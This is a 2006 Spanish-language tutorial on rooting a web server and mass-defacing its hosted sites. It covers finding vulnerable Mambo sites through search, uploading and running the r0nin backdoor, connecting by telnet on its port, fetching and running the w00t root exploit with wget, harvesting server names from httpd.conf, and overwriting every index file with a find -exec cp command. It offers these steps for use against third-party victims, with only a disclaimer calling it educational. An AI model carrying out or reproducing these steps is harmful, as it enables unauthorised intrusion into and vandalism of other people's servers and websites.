Haciendo root y mass deface Autor: 0o_zeus_o0 Sitio: www.elitemexico.

org Buscando victimas: Es muy fcil hoy en dia buscar victimas a explotar cualquier vulnerabilidad, tales como xss , html inyeccin , remote file inclusin, entre otros . Como las buscamos? Pues sencillo simplemente vamos a nuestro buscador de preferencia , en mi caso google , buscaremos algo como mmm mambo J creo ese estara bien . Ia ke encontramos algunas paginas vulnerables chekamos kual de esos servers se puede hacer root io tuve suerte y en la tercera bsqueda salio un servidor Linux redhat con un kernel 2.4.20-2.11 del 2003 como lo ven en la imagen

Xplotando vulnerabilidad: Ya ke encontramos nuestra victima nos disponemos a meter el backdoor , en mi caso usare el r0nin , ke es muy famoso y lo pueden encontrar en cualkier parte lo subimos a la pagina y nos disponemos a darles permisos 777 y ejecutarlo , como aremos eso? Simple solo vamos a poner en la caja de comandos Chmod 777 r0nin; ./r0nin Y nos saldra algo como esto PsychoPhobia Backdoor is starting...OK, pid = 26528 Conectando y haciendo root:

Bien tenemos nuestro backdoor listo para usar, ahora usaremos la siguiente herramienta putty este es un cliente muy bueno para telnet y ssh , lo abrimos y en el campo de host pondremos la direccin ke atakaremos y seleccionamos la opcin telnet en el puerto 1666 ke es el puerto ke usa nuestro backdoor como lo ven en la siguiente imagen.

Created with novaPDF Printer (www.novaPDF.com)

Despus de esto nos saldr una pantalla negra, lo cual significa ke nuestro backdoor hizo conexin, ahora nos disponemos a ejecutar comandos, en este caso no usare muchos, para empezar usare id, esto es para ver los permisos ke tenemos , como podemos ver en la imagen tenemos permisos uid=48(apache) gid=48(apache) groups=48(apache)

los cuales cambiaremos por permisos de root , despus de que nos conecto a telnet , subiremos nuestro xploit con el cual rotearemos el servidor , en mi caso usare el w00t , lo subiremos a el servidor usando wget y le daremos permisos 777 y lo ejecutaremos como lo vemos en las siguientes imgenes

Created with novaPDF Printer (www.novaPDF.com)

Listo tenemos root , el siguiente paso sera buscar el archivo httpd.conf , por lo regular se encuentra en las carpetas /etc/httpd/conf/httpd.conf Pero si no es asi usaremos find / -name httpd.conf ia ke lo encontramos guardaremos su contenido en un .txt con el siguiente comando cat /etc/httpd/conf/httpd.conf | grep ServerName >/home/shito-ryu/public_html/webs.txt (se preguntaran para que hacemos eso , es para saber la configuracin del servidor y los sitios ke tiene)

Sobre escribiendo index: Despus de haber sakado el httpd.conf y haber enlistado las webs vamos a sobre escribir todos los index de el servidor , primero tenemos ke subir un mirror el cual sobre escribir los dems index , el mio en este casi se llama lol.html , lo pondr en la carpeta principal , despus de eso pongo

find / -name "index.*" -exec cp /home/shito-ryu/public_html/lol.html {} \; eso es en mi caso ia ke la carpeta public_html tenia permisos pero puede ser tambin de estar forma

Created with novaPDF Printer (www.novaPDF.com)

find / -name "index.*" -exec cp /tmp/ lol.html {} \; o de donde se encuentre su mirror

Esto llevara algunos minutos si es ke son varios sitios , sabremos ke ha terminado ia ke nos enviara de nuevo Sh-2.05b# para ejecutar un comando El final si revisamos los sitios aparecera su mirror en el index

Despedida : Espero ke les sirva de algo este manual para las personas ke inician en este medio, el contenido es educativo, si el uso mal apropiado de este manual se llega a dar es responsabilidad de el lector no de el autor , si tienes algun comentario envia un correo a zeus@diosdelared.com

Agradecimientos: A mi chikita Lady Fire, mi beba , a fraude , x0x0 ,Pandora, eL_mEsIAs y a todos akellos aquellos ke han estado a mi lado todo este tiempo

No modificar este tutorial. Mexico 24 de enero de 2006

Created with novaPDF Printer (www.novaPDF.com)